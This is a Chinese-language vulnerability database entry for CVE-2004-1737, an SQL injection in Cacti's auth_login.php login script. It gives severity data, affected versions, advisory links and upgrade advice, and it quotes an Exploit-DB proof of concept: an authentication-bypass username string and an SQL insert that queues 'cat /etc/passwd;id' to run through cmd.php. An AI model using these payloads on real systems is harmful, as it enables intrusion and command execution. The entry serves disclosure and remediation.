CVE-2004-1737
CVSS7.5
发布时间 :2004-08-16 00:00:00
修订时间 :2016-10-17 23:00:12
NMCOE    

[原文]SQL injection vulnerability in auth_login.php in Cacti 0.8.5a allows remote attackers to execute arbitrary SQL commands and bypass authentication via the (1) username or (2) password parameters.


[CNNVD]RaXnet Cacti Auth_Login.PHP SQL注入漏洞(CNNVD-200408-133)

        Cacti 0.8.5a 版本中的auth_login.php存在SQL注入漏洞。远程攻击者可以通过(1) username参数或 (2) password参数执行任意SQL命令和绕过验证。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:the_cacti_group:cacti:0.8.3a
cpe:/a:the_cacti_group:cacti:0.8.2a
cpe:/a:the_cacti_group:cacti:0.6.8a
cpe:/a:the_cacti_group:cacti:0.6
cpe:/a:the_cacti_group:cacti:0.6.1
cpe:/a:the_cacti_group:cacti:0.8.5a
cpe:/o:gentoo:linux:1.4Gentoo Linux 1.4
cpe:/a:the_cacti_group:cacti:0.6.2
cpe:/a:the_cacti_group:cacti:0.6.3
cpe:/a:the_cacti_group:cacti:0.8.1
cpe:/a:the_cacti_group:cacti:0.6.8
cpe:/a:the_cacti_group:cacti:0.8
cpe:/a:the_cacti_group:cacti:0.6.4
cpe:/a:the_cacti_group:cacti:0.8.2
cpe:/a:the_cacti_group:cacti:0.6.5
cpe:/a:the_cacti_group:cacti:0.8.3
cpe:/a:the_cacti_group:cacti:0.6.6
cpe:/a:the_cacti_group:cacti:0.8.4
cpe:/a:the_cacti_group:cacti:0.6.7
cpe:/a:the_cacti_group:cacti:0.8.5

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1737
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1737
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200408-133
(官方数据源) CNNVD

- 其它链接及资源

http://lists.grok.org.uk/pipermail/full-disclosure/2004-August/025376.html
(UNKNOWN)  FULLDISC  20040816 SQL Injection in CACTI
http://marc.info/?l=bugtraq&m=109272483621038&w=2
(UNKNOWN)  BUGTRAQ  20040816 SQL Injection in CACTI
http://www.gentoo.org/security/en/glsa/glsa-200408-21.xml
(VENDOR_ADVISORY)  GENTOO  GLSA-200408-21
http://www.securityfocus.com/bid/10960
(VENDOR_ADVISORY)  BID  10960
http://xforce.iss.net/xforce/xfdb/17011
(VENDOR_ADVISORY)  XF  cacti-authlogin-sql-injection(17011)

- 漏洞信息

RaXnet Cacti Auth_Login.PHP SQL注入漏洞
高危 SQL注入
2004-08-16 00:00:00 2006-08-28 00:00:00
远程  
        Cacti 0.8.5a 版本中的auth_login.php存在SQL注入漏洞。远程攻击者可以通过(1) username参数或 (2) password参数执行任意SQL命令和绕过验证。

- 公告与补丁

        It is reported that this vulnerability is addressed in the CVS release. This is not confirmed.
        Gentoo has released advisory GLSA 200408-21 dealing with this issue. Users are advised to upgrade to the latest available version of Cacti using the following sequence of commands:
        # emerge sync
        # emerge -pv ">=net-analyzer/cacti-0.8.5a-r1"
         # emerge ">=net-analyzer/cacti-0.8.5a-r1"
        Please see the referenced Gentoo advisory for more information.
        Gentoo has released an update to the above-mentioned advisory; the workaround section has been updated. Please see the referenced advisory for more information.
        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (24375)

RaXnet Cacti 0.6.x/0.8.x Auth_Login.PHP SQL Injection Vulnerability (EDBID:24375)
php webapps
2004-07-16 Verified
0 Fernando Quintero
N/A [点击下载]
source: http://www.securityfocus.com/bid/10960/info

RaXnet Cacti is reportedly affected by a remote SQL injection vulnerability. This issue occurs in the auth_login.php script due to a failure of the application to properly sanitize user-supplied "username" URI parameter input before using it in an SQL query.

It is demonstrated that an attacker may exploit this vulnerability in order to bypass the authentication interface used by Cacti.

username = admin' or '6'='6
password = password wished

insert into data_input_data_cache (local_data_id, host_id,
data_input_id, action, command, hostname, snmp_community,
snmp_version, snmp_username, snmp_password, snmp_port, snmp_timeout,
rrd_name, rrd_path, rrd_num, arg1, arg2, arg3)
values ('9', '1', '7', '1', 'cat /etc/passwd;id;somecommand; some
script', '127.0.0.1', '', '1', '', '', '161', '500',
'hack', '/', '3', 'NULL', 'NULL', 'NULL');

Then points to http://www.example.com/cacti/cmd.php and the command will be
executed.		

- 漏洞信息

8989
Cacti auth_login.php SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity, Loss of Availability
Exploit Public

- 漏洞描述

Cacti contains a flaw that will allow an attacker to inject arbitrary SQL code. The problem is that the username and password variables in the auth_login.php module is not verified properly and will allow an attacker to inject or manipulate SQL queries.

- 时间线

2004-08-18 2004-08-16
2004-08-18 Unknow

- 解决方案

Upgrade to version 0.8.6 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站